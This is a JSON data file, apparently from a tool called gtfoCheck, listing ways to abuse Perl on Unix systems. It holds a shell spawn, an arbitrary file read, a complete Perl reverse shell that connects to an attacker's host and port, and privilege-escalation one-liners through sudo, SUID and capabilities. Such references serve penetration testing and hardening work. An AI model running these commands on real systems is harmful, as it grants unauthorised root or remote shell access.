gtfoCheck/data/perl.json

{
  "functions": {
    "shell": [
      {
        "code": "perl -e 'exec \"/bin/sh\";'"
      }
    ],
    "file-read": [
      {
        "code": "perl -ne print [file]"
      }
    ],
    "reverse-shell": [
      {
        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
        "code": "perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in([port],inet_aton(\"[host]\")))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n"
      }
    ],
    "suid": [
      {
        "code": "./perl -e 'exec \"/bin/sh\";'"
      }
    ],
    "sudo": [
      {
        "code": "sudo perl -e 'exec \"/bin/sh\";'"
      }
    ],
    "capabilities": [
      {
        "code": "./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'"
      }
    ]
  }
}